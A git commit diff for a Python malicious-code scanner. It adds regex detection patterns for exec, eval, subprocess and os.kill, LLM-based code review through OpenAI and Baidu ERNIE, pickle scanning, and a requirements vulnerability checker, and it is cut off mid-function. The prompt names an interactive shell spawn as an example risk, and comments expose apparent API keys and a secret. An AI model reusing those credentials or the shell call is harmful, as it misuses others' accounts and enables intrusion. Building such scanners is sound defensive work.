tests/final-tests 完成最终代码 #34
							
								
								
									
										2
									
								
								.gitignore
									
									
									
									
										vendored
									
									
								
							
							
						
						
									
										2
									
								
								.gitignore
									
									
									
									
										vendored
									
									
								
							| @@ -159,4 +159,4 @@ cython_debug/ | |||||||
| #  and can be added to the global gitignore or merged into this file.  For a more nuclear | #  and can be added to the global gitignore or merged into this file.  For a more nuclear | ||||||
| #  option (not recommended) you can uncomment the following to ignore the entire idea folder. | #  option (not recommended) you can uncomment the following to ignore the entire idea folder. | ||||||
| .idea/ | .idea/ | ||||||
|  | tmp/ | ||||||
|   | |||||||
| @@ -1,8 +1,11 @@ | |||||||
| import json | import json | ||||||
| import os | import os | ||||||
|  | import threading | ||||||
|  | import time | ||||||
|  |  | ||||||
| from .utils import * | from .utils import * | ||||||
| import openai | import openai | ||||||
| import signal | # import signal | ||||||
|  |  | ||||||
|  |  | ||||||
| class TimeoutException(Exception): | class TimeoutException(Exception): | ||||||
| @@ -22,10 +25,10 @@ def detectGPT(content: str): | |||||||
|         raise ValueError("env OPENAI_API_KEY no set") |         raise ValueError("env OPENAI_API_KEY no set") | ||||||
|  |  | ||||||
|     # Set alarm timer |     # Set alarm timer | ||||||
|     signal.signal(signal.SIGTERM, timeout_handler) |     # signal.signal(signal.SIGTERM, timeout_handler) | ||||||
|     signal.alarm(10) |     # signal.alarm(10) | ||||||
|  |  | ||||||
|     client = openai.OpenAI(api_key=api_key) |     client = openai.OpenAI(base_url="https://api.kpi7.cn/v1", api_key=api_key) | ||||||
|     text = content |     text = content | ||||||
|     # client = openai.OpenAI(api_key="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") #测试用key |     # client = openai.OpenAI(api_key="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") #测试用key | ||||||
|     response = client.chat.completions.create( |     response = client.chat.completions.create( | ||||||
| @@ -34,14 +37,16 @@ def detectGPT(content: str): | |||||||
|                 "role": "system", |                 "role": "system", | ||||||
|                 "content": "You are a Python code reviewer.Read the code below and identify any potential security vulnerabilities. Classify them by risk level (high, medium, low, none). Only report the line number and the risk level.\nYou should output the result as json format in one line. For example: " |                 "content": "You are a Python code reviewer.Read the code below and identify any potential security vulnerabilities. Classify them by risk level (high, medium, low, none). Only report the line number and the risk level.\nYou should output the result as json format in one line. For example: " | ||||||
|                            '[{"Line": {the line number}, "Risk": "{choose from (high,medium,low)}","Reason":"{how it is vulnable}"}] Each of these three field is required.\n' |                            '[{"Line": {the line number}, "Risk": "{choose from (high,medium,low)}","Reason":"{how it is vulnable}"}] Each of these three field is required.\n' | ||||||
|                 "You are required to only output the json format. Do not output any other information.\n", |                            "You are required to only output the json format. Do not output any other information.请注意:只对有具体危害的代码片段判定为有风险。\n" | ||||||
|  |                            "For examples:\nos.system('ls'),subprocess.call(['ls', '-l']),subprocess.call([\"/bin/sh\",\"-i\"]),eval(code),exec(code) and so on.\n" | ||||||
|  |                            "Please IGNORE the risks that dont matter a lot.", | ||||||
|             }, |             }, | ||||||
|             { |             { | ||||||
|                 "role": "user", |                 "role": "user", | ||||||
|                 "content": text, |                 "content": text, | ||||||
|             }, |             }, | ||||||
|         ], |         ], | ||||||
|         model="gpt-3.5-turbo", |         model="gpt-4o", | ||||||
|     ) |     ) | ||||||
|     try: |     try: | ||||||
|         message_content = response.choices[0].message.content |         message_content = response.choices[0].message.content | ||||||
| @@ -55,12 +60,46 @@ def detectGPT(content: str): | |||||||
|     except TimeoutException: |     except TimeoutException: | ||||||
|         raise TimeoutException("The api call timed out") |         raise TimeoutException("The api call timed out") | ||||||
|  |  | ||||||
|     finally: |     # finally: | ||||||
|         signal.alarm(0) |     #     signal.alarm(0) | ||||||
|  |  | ||||||
|     classified_results = {"high": [], "medium": [], "low": [], "none": []} |     classified_results = {"high": [], "medium": [], "low": [], "none": []} | ||||||
|     for res in res_json: |     for res in res_json: | ||||||
|  |         try: | ||||||
|             classified_results[res["Risk"]].append( |             classified_results[res["Risk"]].append( | ||||||
|                 (res["Line"], text.split("\n")[res["Line"] - 1].strip()) |                 (res["Line"], text.split("\n")[res["Line"] - 1].strip()) | ||||||
|             ) |             ) | ||||||
|  |         except IndexError: | ||||||
|  |             pass | ||||||
|     return classified_results |     return classified_results | ||||||
|  |  | ||||||
|  |  | ||||||
|  | def GPTdetectFileList(fileList): | ||||||
|  |     # print(len(fileList)) | ||||||
|  |     results = {"high": [], "medium": [], "low": [], "none": []} | ||||||
|  |     threads = [] | ||||||
|  |     for file in fileList: | ||||||
|  |         content = read_file_content(str(file)) | ||||||
|  |         threads.append(threading.Thread(target=GPTThread, args=(str(file), content, results))) | ||||||
|  |     for thread in threads: | ||||||
|  |         thread.start() | ||||||
|  |         time.sleep(0.1) | ||||||
|  |     for thread in threads: | ||||||
|  |         thread.join() | ||||||
|  |     return results | ||||||
|  |  | ||||||
|  |  | ||||||
|  | def GPTThread(filename, content, results): | ||||||
|  |     try: | ||||||
|  |         res = detectGPT(content) | ||||||
|  |         # print(res) | ||||||
|  |         for key in res: | ||||||
|  |             if key != "none":  # Exclude 'none' risk level | ||||||
|  |                 results[key].extend( | ||||||
|  |                     [ | ||||||
|  |                         (f"{filename}: Line {line_num}", line) | ||||||
|  |                         for line_num, line in res[key] | ||||||
|  |                     ] | ||||||
|  |                 ) | ||||||
|  |     except Exception as e: | ||||||
|  |         print(e) | ||||||
|   | |||||||
| @@ -12,7 +12,7 @@ def find_dangerous_functions( | |||||||
|             r"\bexec\(": "high", |             r"\bexec\(": "high", | ||||||
|             r"\bpopen\(": "medium", |             r"\bpopen\(": "medium", | ||||||
|             r"\beval\(": "high", |             r"\beval\(": "high", | ||||||
|             r"\bsubprocess\.run\(": "medium", |             r"\bsubprocess": "medium", | ||||||
|             r"\b__getattribute__\(": "high", |             r"\b__getattribute__\(": "high", | ||||||
|             r"\bgetattr\(": "medium", |             r"\bgetattr\(": "medium", | ||||||
|             r"\b__import__\(": "high", |             r"\b__import__\(": "high", | ||||||
| @@ -34,6 +34,7 @@ def find_dangerous_functions( | |||||||
|             r"\bos\.kill\b": "high", |             r"\bos\.kill\b": "high", | ||||||
|             r"\bos\.popen\b": "medium", |             r"\bos\.popen\b": "medium", | ||||||
|             r"\bos\.spawn\b": "medium", |             r"\bos\.spawn\b": "medium", | ||||||
|  |             r"\bsubprocess": "medium", | ||||||
|         }, |         }, | ||||||
|     } |     } | ||||||
|     risk_patterns = patterns.get(file_extension, {}) |     risk_patterns = patterns.get(file_extension, {}) | ||||||
| @@ -43,7 +44,9 @@ def find_dangerous_functions( | |||||||
|             clean_line = remove_comments(line, file_extension) |             clean_line = remove_comments(line, file_extension) | ||||||
|             if not clean_line: |             if not clean_line: | ||||||
|                 continue |                 continue | ||||||
|  |             # 消除换行符,避免影响正则匹配 | ||||||
|  |             clean_line = clean_line.replace("\\n", "") | ||||||
|             for pattern, risk_level in risk_patterns.items(): |             for pattern, risk_level in risk_patterns.items(): | ||||||
|                 if re.search(pattern, clean_line): |                 if re.search(pattern, clean_line, re.MULTILINE | re.DOTALL): | ||||||
|                     classified_results[risk_level].append((line_number, clean_line)) |                     classified_results[risk_level].append((line_number, clean_line)) | ||||||
|     return classified_results |     return classified_results | ||||||
|   | |||||||
| @@ -1,10 +1,17 @@ | |||||||
|  | import json | ||||||
| import os | import os | ||||||
| from typing import Dict, List, Tuple, Optional | from typing import Dict, List, Tuple, Optional | ||||||
| from reportlab.lib.pagesizes import letter | from reportlab.lib.pagesizes import letter | ||||||
| from reportlab.lib.styles import getSampleStyleSheet | from reportlab.lib.styles import getSampleStyleSheet | ||||||
| from reportlab.platypus import Paragraph, Spacer, SimpleDocTemplate | from reportlab.platypus import Paragraph, Spacer, SimpleDocTemplate | ||||||
|  |  | ||||||
|  | from detection.pickle_detection import pickleDataDetection | ||||||
|  |  | ||||||
|  | from .requirements_detection import requirement_detection | ||||||
| from .Regexdetection import find_dangerous_functions | from .Regexdetection import find_dangerous_functions | ||||||
| from .GPTdetection import detectGPT | from .GPTdetection import detectGPT, GPTdetectFileList | ||||||
|  |  | ||||||
|  | # from .cngptdetection import detectGPT,GPTdetectFileList | ||||||
| from .pyc_detection import disassemble_pyc | from .pyc_detection import disassemble_pyc | ||||||
| from .utils import * | from .utils import * | ||||||
| import sys | import sys | ||||||
| @@ -14,7 +21,7 @@ from pathlib import Path | |||||||
|  |  | ||||||
| PYCDC_FLAG = True | PYCDC_FLAG = True | ||||||
| PYCDC_ADDR_FLAG = True | PYCDC_ADDR_FLAG = True | ||||||
| SUPPORTED_EXTENSIONS = {".py", ".js", ".cpp", ".pyc"} | SUPPORTED_EXTENSIONS = {".py", ".js", ".cpp", ".pyc",".pkl",".pickle"} | ||||||
| OUTPUT_FORMATS = ["html", "md", "txt", "pdf"] | OUTPUT_FORMATS = ["html", "md", "txt", "pdf"] | ||||||
| ORDERS = [ | ORDERS = [ | ||||||
|     "__import__", |     "__import__", | ||||||
| @@ -26,6 +33,8 @@ ORDERS = [ | |||||||
|     "__getattribute__", |     "__getattribute__", | ||||||
|     "getattr", |     "getattr", | ||||||
|     "child_process", |     "child_process", | ||||||
|  |     "kill", | ||||||
|  |     "fork", | ||||||
| ] | ] | ||||||
|  |  | ||||||
| # Initialize colorama | # Initialize colorama | ||||||
| @@ -102,9 +111,15 @@ def generate_text_content(results: Dict[str, List[Tuple[int, str]]]) -> str: | |||||||
|  |  | ||||||
|     text_output = "Security Analysis Report\n" |     text_output = "Security Analysis Report\n" | ||||||
|     text_output += "=" * 30 + "\n\n" |     text_output += "=" * 30 + "\n\n" | ||||||
|  |     # text_output+= "chatGPT检测结果:\n\n" | ||||||
|  |  | ||||||
|     for risk_level, entries in results.items(): |     for risk_level, entries in results.items(): | ||||||
|         if entries and risk_level != "none": |         # print(risk_level, entries) | ||||||
|  |         if risk_level == "pickles": | ||||||
|  |             text_output += f"Pickles:\n" | ||||||
|  |             for i in entries: | ||||||
|  |                 text_output += f"  {i['file']}:{json.dumps(i['result'])}\n" | ||||||
|  |         elif entries and risk_level != "none": | ||||||
|             risk_color = ( |             risk_color = ( | ||||||
|                 { |                 { | ||||||
|                     "high": Fore.RED, |                     "high": Fore.RED, | ||||||
| @@ -359,9 +374,14 @@ def checkModeAndDetect(mode: str, filePath: str, fileExtension: str, pycdc_addr: | |||||||
|  |  | ||||||
|  |  | ||||||
| def process_path( | def process_path( | ||||||
|     path: str, output_format: str, mode: str, pycdc_addr: str, output_file=None |     path: str, | ||||||
|  |     output_format: str, | ||||||
|  |     mode: str, | ||||||
|  |     pycdc_addr: str, | ||||||
|  |     output_file=None, | ||||||
|  |     requirement_path=None, | ||||||
| ): | ): | ||||||
|     results = {"high": [], "medium": [], "low": [], "none": []} |     results = {"high": [], "medium": [], "low": [], "none": [], "pickles": []} | ||||||
|     if os.path.isdir(path): |     if os.path.isdir(path): | ||||||
|         # 使用rglob获取所有文件 |         # 使用rglob获取所有文件 | ||||||
|         all_files = [ |         all_files = [ | ||||||
| @@ -369,10 +389,19 @@ def process_path( | |||||||
|             for file_path in Path(path).rglob("*") |             for file_path in Path(path).rglob("*") | ||||||
|             if file_path.suffix in SUPPORTED_EXTENSIONS |             if file_path.suffix in SUPPORTED_EXTENSIONS | ||||||
|         ] |         ] | ||||||
|  |         print(all_files) | ||||||
|  |         if mode == "llm": | ||||||
|  |             results = GPTdetectFileList(all_files) | ||||||
|  |         else: | ||||||
|             # 扫描动画 |             # 扫描动画 | ||||||
|             for file_path in tqdm(all_files, desc="Scanning files", unit="file"): |             for file_path in tqdm(all_files, desc="Scanning files", unit="file"): | ||||||
|                 file_extension = file_path.suffix |                 file_extension = file_path.suffix | ||||||
|  |                 # print(file_extension) | ||||||
|  |                 if file_extension in [".pkl",".pickle"]: | ||||||
|  |                     # print("识别到pickle") | ||||||
|  |                     res = pickleDataDetection(str(file_path), output_file) | ||||||
|  |                     results["pickles"].append({"file": str(file_path), "result": res}) | ||||||
|  |                     continue | ||||||
|                 file_results = checkModeAndDetect( |                 file_results = checkModeAndDetect( | ||||||
|                     mode, str(file_path), file_extension, pycdc_addr |                     mode, str(file_path), file_extension, pycdc_addr | ||||||
|                 ) |                 ) | ||||||
| @@ -387,7 +416,10 @@ def process_path( | |||||||
|                             ) |                             ) | ||||||
|     elif os.path.isfile(path): |     elif os.path.isfile(path): | ||||||
|         file_extension = os.path.splitext(path)[1] |         file_extension = os.path.splitext(path)[1] | ||||||
|         if file_extension in SUPPORTED_EXTENSIONS: |         if file_extension in [".pkl", ".pickle"]: | ||||||
|  |             res = pickleDataDetection(str(path), output_file) | ||||||
|  |             results["pickles"].append({"file": str(path), "result": res}) | ||||||
|  |         elif file_extension in SUPPORTED_EXTENSIONS: | ||||||
|             file_results = checkModeAndDetect(mode, path, file_extension, pycdc_addr) |             file_results = checkModeAndDetect(mode, path, file_extension, pycdc_addr) | ||||||
|             if file_results is not None: |             if file_results is not None: | ||||||
|                 for key in file_results: |                 for key in file_results: | ||||||
| @@ -404,7 +436,8 @@ def process_path( | |||||||
|     else: |     else: | ||||||
|         print("Invalid path.") |         print("Invalid path.") | ||||||
|         sys.exit(1) |         sys.exit(1) | ||||||
|  |     if requirement_path is not None: | ||||||
|  |         requirement_detection(requirement_path, output_file) | ||||||
|     output_results(results, output_format, output_file) |     output_results(results, output_format, output_file) | ||||||
|  |  | ||||||
|  |  | ||||||
| @@ -420,7 +453,22 @@ def main(): | |||||||
|         "-m", "--mode", help="Mode of operation:[regex,llm]", default="regex" |         "-m", "--mode", help="Mode of operation:[regex,llm]", default="regex" | ||||||
|     ) |     ) | ||||||
|     parser.add_argument( |     parser.add_argument( | ||||||
|         "-p", "--pycdc", help="Path to pycdc.exe to decompile", default=None |         "-p", | ||||||
|  |         "--pycdc", | ||||||
|  |         help="Path to pycdc.exe to decompile", | ||||||
|  |         default=os.getenv("PATH"), | ||||||
|  |     ) | ||||||
|  |     parser.add_argument( | ||||||
|  |         "-P", | ||||||
|  |         "--Pickle", | ||||||
|  |         help="Path to pickle file to analyze", | ||||||
|  |         default=None, | ||||||
|  |     ) | ||||||
|  |     parser.add_argument( | ||||||
|  |         "-r", | ||||||
|  |         "--requirement", | ||||||
|  |         help="Path to requirement file to analyze", | ||||||
|  |         default=None, | ||||||
|     ) |     ) | ||||||
|     args = parser.parse_args() |     args = parser.parse_args() | ||||||
|     output_format = "txt"  # Default output format |     output_format = "txt"  # Default output format | ||||||
| @@ -437,7 +485,9 @@ def main(): | |||||||
|             ) |             ) | ||||||
|             output_file = args.output.rsplit(".", 1)[0] + ".txt" |             output_file = args.output.rsplit(".", 1)[0] + ".txt" | ||||||
|     # 如果未指定输出文件,则输出到 stdout;否则写入文件 |     # 如果未指定输出文件,则输出到 stdout;否则写入文件 | ||||||
|     process_path(args.path, output_format, args.mode, args.pycdc, output_file) |     process_path( | ||||||
|  |         args.path, output_format, args.mode, args.pycdc, output_file, args.requirement | ||||||
|  |     ) | ||||||
|     if PYCDC_FLAG == False: |     if PYCDC_FLAG == False: | ||||||
|         print( |         print( | ||||||
|             "ERROR: Detected Python 3.11 or above .pyc files. You need to install pycdc and compile it yourself to obtain pycdc." |             "ERROR: Detected Python 3.11 or above .pyc files. You need to install pycdc and compile it yourself to obtain pycdc." | ||||||
|   | |||||||
| @@ -1,16 +1,21 @@ | |||||||
| import os | import os | ||||||
|  | import threading | ||||||
|  | import time | ||||||
|  |  | ||||||
| import requests | import requests | ||||||
| import re | import re | ||||||
| import json | import json | ||||||
| from typing import List, Dict, Any | from typing import List, Dict, Any | ||||||
|  |  | ||||||
|  | from detection.utils import read_file_content | ||||||
|  |  | ||||||
|  |  | ||||||
| class TimeoutException(Exception): | class TimeoutException(Exception): | ||||||
|     """自定义异常用于处理超时情况。""" |     """自定义异常用于处理超时情况。""" | ||||||
|     pass |     pass | ||||||
|  |  | ||||||
|  |  | ||||||
| def detectGPT(content: str) -> str: | def detectGPT(content: str,token:str): | ||||||
|     """ |     """ | ||||||
|     检测给定的代码内容中的潜在安全漏洞。 |     检测给定的代码内容中的潜在安全漏洞。 | ||||||
|  |  | ||||||
| @@ -20,15 +25,8 @@ def detectGPT(content: str) -> str: | |||||||
|     返回: |     返回: | ||||||
|     - 分类后的漏洞信息的JSON字符串。 |     - 分类后的漏洞信息的JSON字符串。 | ||||||
|     """ |     """ | ||||||
|     api_key = os.getenv("BAIDU_API_KEY") |  | ||||||
|     secret_key = os.getenv("BAIDU_SECRET_KEY") |  | ||||||
|     #api_key = "DUBWNIrB6QJLOsLkpnEz2ZZa" |  | ||||||
|     #secret_key = "9WK4HIV2n9r1ePPirqD4EQ6Ea33rH1m7" |  | ||||||
|     if not api_key or not secret_key: |  | ||||||
|         raise ValueError("BAIDU_API_KEY or BAIDU_SECRET_KEY is not set") |  | ||||||
|  |  | ||||||
|     url = "https://aip.baidubce.com/rpc/2.0/ai_custom/v1/wenxinworkshop/chat/ernie-4.0-8k-0329?access_token=" + get_access_token( |     url = "https://aip.baidubce.com/rpc/2.0/ai_custom/v1/wenxinworkshop/chat/ernie-4.0-8k-0329?access_token=" + token | ||||||
|         api_key, secret_key) |  | ||||||
|  |  | ||||||
|     payload = json.dumps({ |     payload = json.dumps({ | ||||||
|         "messages": [ |         "messages": [ | ||||||
| @@ -63,6 +61,7 @@ def detectGPT(content: str) -> str: | |||||||
|  |  | ||||||
|     classified_results = {"high": [], "medium": [], "low": [], "none": []} |     classified_results = {"high": [], "medium": [], "low": [], "none": []} | ||||||
|     for res in extracted_data: |     for res in extracted_data: | ||||||
|  |         # print(res) | ||||||
|         try: |         try: | ||||||
|             line_number = int(res["Line"]) |             line_number = int(res["Line"]) | ||||||
|             classified_results[res["Risk"]].append( |             classified_results[res["Risk"]].append( | ||||||
| @@ -71,7 +70,7 @@ def detectGPT(content: str) -> str: | |||||||
|         except (ValueError, IndexError, KeyError): |         except (ValueError, IndexError, KeyError): | ||||||
|             continue |             continue | ||||||
|  |  | ||||||
|     return json.dumps(classified_results, indent=2, ensure_ascii=False) |     return classified_results | ||||||
|  |  | ||||||
|  |  | ||||||
| def get_access_token(api_key: str, secret_key: str) -> str: | def get_access_token(api_key: str, secret_key: str) -> str: | ||||||
| @@ -111,3 +110,40 @@ def extract_json_from_text(text: str) -> List[Dict[str, Any]]: | |||||||
|         return [] |         return [] | ||||||
|  |  | ||||||
|     return data |     return data | ||||||
|  |  | ||||||
|  |  | ||||||
|  | def GPTdetectFileList(fileList): | ||||||
|  |     api_key = os.getenv("BAIDU_API_KEY") | ||||||
|  |     secret_key = os.getenv("BAIDU_SECRET_KEY") | ||||||
|  |     # api_key = "DUBWNIrB6QJLOsLkpnEz2ZZa" | ||||||
|  |     # secret_key = "9WK4HIV2n9r1ePPirqD4EQ6Ea33rH1m7" | ||||||
|  |     if not api_key or not secret_key: | ||||||
|  |         raise ValueError("BAIDU_API_KEY or BAIDU_SECRET_KEY is not set") | ||||||
|  |     # print(len(fileList)) | ||||||
|  |     results = {"high": [], "medium": [], "low": [], "none": []} | ||||||
|  |     threads = [] | ||||||
|  |     token = get_access_token(api_key, secret_key) | ||||||
|  |     # print(token) | ||||||
|  |     for file in fileList: | ||||||
|  |         content = read_file_content(str(file)) | ||||||
|  |         threads.append(threading.Thread(target=GPTThread, args=(str(file), content, results,token))) | ||||||
|  |     for thread in threads: | ||||||
|  |         thread.start() | ||||||
|  |         time.sleep(0.5) | ||||||
|  |     for thread in threads: | ||||||
|  |         thread.join() | ||||||
|  |     return results | ||||||
|  |  | ||||||
|  |  | ||||||
|  | def GPTThread(filename, content, results,token): | ||||||
|  |  | ||||||
|  |         res = detectGPT(content,token) | ||||||
|  |         # print(res) | ||||||
|  |         for key in res: | ||||||
|  |             if key != "none":  # Exclude 'none' risk level | ||||||
|  |                 results[key].extend( | ||||||
|  |                     [ | ||||||
|  |                         (f"{filename}: Line {line_num}", line) | ||||||
|  |                         for line_num, line in res[key] | ||||||
|  |                     ] | ||||||
|  |                 ) | ||||||
|   | |||||||
| @@ -142,11 +142,7 @@ def pickleDataDetection(filename: str, output_file=None): | |||||||
|         pickscan = pickleScanner(file) |         pickscan = pickleScanner(file) | ||||||
|         pickscan.load() |         pickscan.load() | ||||||
|     res = pickscan.output() |     res = pickscan.output() | ||||||
|     if output_file: |     return res | ||||||
|         with open(output_file, "w") as file: |  | ||||||
|             json.dump(res, file, indent=4) |  | ||||||
|     else: |  | ||||||
|         print(json.dumps(res)) |  | ||||||
|  |  | ||||||
|  |  | ||||||
| if __name__ == "__main__": | if __name__ == "__main__": | ||||||
|   | |||||||
| @@ -1,5 +1,4 @@ | |||||||
| from typing import List, Tuple | from typing import List, Tuple | ||||||
| import uncompyle6 |  | ||||||
| import io | import io | ||||||
| import os | import os | ||||||
| import subprocess | import subprocess | ||||||
| @@ -39,10 +38,6 @@ def disassemble_pyc(file_path: str, pycdc_addr=None) -> str: | |||||||
|         str: The disassembled code as a string. |         str: The disassembled code as a string. | ||||||
|     """ |     """ | ||||||
|     output = io.StringIO() |     output = io.StringIO() | ||||||
|     try: |  | ||||||
|         uncompyle6.main.decompile_file(file_path, output) |  | ||||||
|         return output.getvalue() |  | ||||||
|     except Exception as e: |  | ||||||
|     if pycdc_addr is None: |     if pycdc_addr is None: | ||||||
|         return "none" |         return "none" | ||||||
|     else: |     else: | ||||||
|   | |||||||
| @@ -1,279 +1,268 @@ | |||||||
| import re |  | ||||||
| import os |  | ||||||
| import requests |  | ||||||
| import argparse | import argparse | ||||||
|  | import requests | ||||||
| from bs4 import BeautifulSoup | from bs4 import BeautifulSoup | ||||||
| from typing import List, Tuple, Optional | from packaging.version import Version, InvalidVersion | ||||||
| from packaging import version | import sys | ||||||
| from packaging.specifiers import SpecifierSet |  | ||||||
| from reportlab.lib.pagesizes import letter | from reportlab.lib.pagesizes import letter | ||||||
| from reportlab.platypus import SimpleDocTemplate, Paragraph, Spacer |  | ||||||
| from reportlab.lib.styles import getSampleStyleSheet, ParagraphStyle | from reportlab.lib.styles import getSampleStyleSheet, ParagraphStyle | ||||||
|  | from reportlab.platypus import SimpleDocTemplate, Paragraph, Spacer | ||||||
|  | from colorama import Fore, Style, init | ||||||
|  | from tqdm import tqdm | ||||||
|  | import html | ||||||
|  | import os | ||||||
|  |  | ||||||
|  |  | ||||||
| def fetch_html(url: str) -> Optional[str]: | init(autoreset=True)  # 初始化colorama,并在每次打印后自动重置颜色 | ||||||
|     """Fetch HTML content from the specified URL. |  | ||||||
|  |  | ||||||
|     Args: |  | ||||||
|         url (str): URL to fetch HTML from. |  | ||||||
|  |  | ||||||
|     Returns: | def fetch_html(url: str) -> str: | ||||||
|         Optional[str]: HTML content as a string, or None if fetch fails. |     try: | ||||||
|     """ |  | ||||||
|         response = requests.get(url) |         response = requests.get(url) | ||||||
|     if response.status_code == 200: |         response.raise_for_status() | ||||||
|         return response.text |         return response.text | ||||||
|     return None |     except requests.RequestException as e: | ||||||
|  |         print(f"Error fetching {url}: {e}") | ||||||
|  |         return "" | ||||||
|  |  | ||||||
|  |  | ||||||
| def parse_html(html: str) -> List[Tuple[str, List[str]]]: | def parse_html(html: str) -> list: | ||||||
|     """Parse HTML to get content of all 'a' and 'span' tags under the second 'td' of each 'tr'. |  | ||||||
|  |  | ||||||
|     Args: |  | ||||||
|         html (str): HTML content as a string. |  | ||||||
|  |  | ||||||
|     Returns: |  | ||||||
|         List[Tuple[str, List[str]]]: A list of tuples containing the text of 'a' tags and lists of 'span' texts. |  | ||||||
|     """ |  | ||||||
|     soup = BeautifulSoup(html, "html.parser") |     soup = BeautifulSoup(html, "html.parser") | ||||||
|     table = soup.find("table", id="sortable-table") |     table = soup.find("table", id="sortable-table") | ||||||
|  |     if not table: | ||||||
|  |         return [] | ||||||
|  |  | ||||||
|  |     rows = table.find_all("tr", class_="vue--table__row") | ||||||
|     results = [] |     results = [] | ||||||
|     if table: |  | ||||||
|         rows = table.find("tbody").find_all("tr") |  | ||||||
|     for row in rows: |     for row in rows: | ||||||
|             tds = row.find_all("td") |         info = {} | ||||||
|             if len(tds) >= 2: |         link = row.find("a") | ||||||
|                 a_tags = tds[1].find_all("a") |         chip = row.find("span", class_="vue--chip__value") | ||||||
|                 span_tags = tds[1].find_all("span") |         if link and chip: | ||||||
|                 spans = [span.text.strip() for span in span_tags] |             info["link"] = link.get_text(strip=True) | ||||||
|                 for a_tag in a_tags: |             info["chip"] = chip.get_text(strip=True) | ||||||
|                     results.append((a_tag.text.strip(), spans)) |             results.append(info) | ||||||
|     return results |     return results | ||||||
|  |  | ||||||
|  |  | ||||||
| def format_results(results: List[Tuple[str, List[str]]]) -> str: | def load_requirements(file_path: str) -> list: | ||||||
|     """Format extracted data as a string. |     requirements = [] | ||||||
|  |     try: | ||||||
|     Args: |         with open(file_path, "r") as file: | ||||||
|         results (List[Tuple[str, List[str]]]): Extracted data to format. |             for line in file: | ||||||
|  |                 line = line.strip() | ||||||
|     Returns: |                 if line and not line.startswith("#"): | ||||||
|         str: Formatted string of the extracted data. |                     requirements.append(line) | ||||||
|     """ |     except FileNotFoundError: | ||||||
|     formatted_result = "" |         print(f"Error: File {file_path} not found.") | ||||||
|     for package_name, version_ranges in results: |         sys.exit(1) | ||||||
|         formatted_result += f"Package Name: {package_name}\n" |  | ||||||
|         formatted_result += "Version Ranges: " + ", ".join(version_ranges) + "\n" |  | ||||||
|         formatted_result += "-" * 50 + "\n" |  | ||||||
|     return formatted_result |  | ||||||
|  |  | ||||||
|  |  | ||||||
| def trans_vulnerable_packages(content): |  | ||||||
|     """将漏洞版本中的集合形式转换为大于小于的格式 |  | ||||||
|     Args: |  | ||||||
|         content (str): 漏洞版本汇总信息. |  | ||||||
|     """ |  | ||||||
|     vulnerabilities = {} |  | ||||||
|     blocks = content.split("--------------------------------------------------") |  | ||||||
|     range_pattern = re.compile(r"\[(.*?),\s*(.*?)\)") |  | ||||||
|  |  | ||||||
|     for block in blocks: |  | ||||||
|         name_match = re.search(r"Package Name: (.+)", block) |  | ||||||
|         if name_match: |  | ||||||
|             package_name = name_match.group(1).strip() |  | ||||||
|             ranges = range_pattern.findall(block) |  | ||||||
|             specifier_list = [] |  | ||||||
|             for start, end in ranges: |  | ||||||
|                 if start and end: |  | ||||||
|                     specifier_list.append(f">={start},<{end}") |  | ||||||
|                 elif start: |  | ||||||
|                     specifier_list.append(f">={start}") |  | ||||||
|                 elif end: |  | ||||||
|                     specifier_list.append(f"<{end}") |  | ||||||
|             if specifier_list: |  | ||||||
|                 vulnerabilities[package_name] = SpecifierSet(",".join(specifier_list)) |  | ||||||
|     return vulnerabilities |  | ||||||
|  |  | ||||||
|  |  | ||||||
| def format_vulnerabilities(vuln_packages): |  | ||||||
|     """将字典形式的漏洞信息格式化 |  | ||||||
|     Args: |  | ||||||
|         vuln_packages (List[Tuple[str, List[str]]]): Extracted data to format. |  | ||||||
|     """ |  | ||||||
|     res = "" |  | ||||||
|     for package, specifiers in vuln_packages.items(): |  | ||||||
|         res += f"Package Name: {package}\n" |  | ||||||
|         res += f"Version Ranges: {specifiers}\n" |  | ||||||
|         res += "-" * 50 + "\n" |  | ||||||
|     return res |  | ||||||
|  |  | ||||||
|  |  | ||||||
| def load_requirements(filename): |  | ||||||
|     """从文件加载项目的依赖信息""" |  | ||||||
|     with open(filename, "r", encoding="utf-8") as file: |  | ||||||
|         lines = file.readlines() |  | ||||||
|     requirements = {} |  | ||||||
|     for line in lines: |  | ||||||
|         if "==" in line: |  | ||||||
|             package_name, package_version = line.strip().split("==") |  | ||||||
|             requirements[package_name] = package_version |  | ||||||
|     return requirements |     return requirements | ||||||
|  |  | ||||||
|  |  | ||||||
| def check_vulnerabilities(requirements, vulnerabilities, output_file): | def version_in_range(version, range_str: str) -> bool: | ||||||
|     """检查依赖项是否存在已知漏洞,并输出结果""" |     if version is not None: | ||||||
|     results_warning = []  # 存储有漏洞的依赖 |         try: | ||||||
|     results_ok = []  # 存储没有漏洞的依赖 |             v = Version(version) | ||||||
|  |         except InvalidVersion: | ||||||
|     for req_name, req_version in requirements.items(): |             return False | ||||||
|         if req_name in vulnerabilities: |  | ||||||
|             spec = vulnerabilities[req_name] |  | ||||||
|             if version.parse(req_version) in spec: |  | ||||||
|                 results_warning.append( |  | ||||||
|                     f"WARNING: {req_name}=={req_version} is vulnerable!" |  | ||||||
|                 ) |  | ||||||
|     else: |     else: | ||||||
|                 results_ok.append(f"OK: {req_name}=={req_version} is not affected.") |         if range_str[-2] == ",": | ||||||
|  |             return True | ||||||
|  |  | ||||||
|  |     ranges = range_str.split(",") | ||||||
|  |     for range_part in ranges: | ||||||
|  |         range_part = range_part.strip("[]()") | ||||||
|  |         if range_part: | ||||||
|  |             try: | ||||||
|  |                 if range_part.endswith(")"): | ||||||
|  |                     upper = Version(range_part[:-1]) | ||||||
|  |                     if v >= upper: | ||||||
|  |                         return False | ||||||
|  |                 elif range_part.startswith("["): | ||||||
|  |                     lower = Version(range_part[1:]) | ||||||
|  |                     if v < lower: | ||||||
|  |                         return False | ||||||
|  |             except InvalidVersion: | ||||||
|  |                 return False | ||||||
|  |     return True | ||||||
|  |  | ||||||
|  |  | ||||||
|  | def check_vulnerabilities(requirements: list, base_url: str) -> str: | ||||||
|  |     results = [] | ||||||
|  |     for req in tqdm(requirements, desc="Checking vulnerabilities", unit="dependency"): | ||||||
|  |         version = "" | ||||||
|  |         if "==" in req: | ||||||
|  |             package_name, version = req.split("==") | ||||||
|         else: |         else: | ||||||
|             results_ok.append( |             package_name, version = req, None | ||||||
|                 f"OK: {req_name} not found in the vulnerability database." |         url = f"{base_url}{package_name}" | ||||||
|             ) |         # print(f"\nFetching data for {package_name} from {url}") | ||||||
|  |         html_content = fetch_html(url) | ||||||
|  |         if html_content: | ||||||
|  |             extracted_data = parse_html(html_content) | ||||||
|  |             if extracted_data: | ||||||
|  |                 relevant_vulns = [] | ||||||
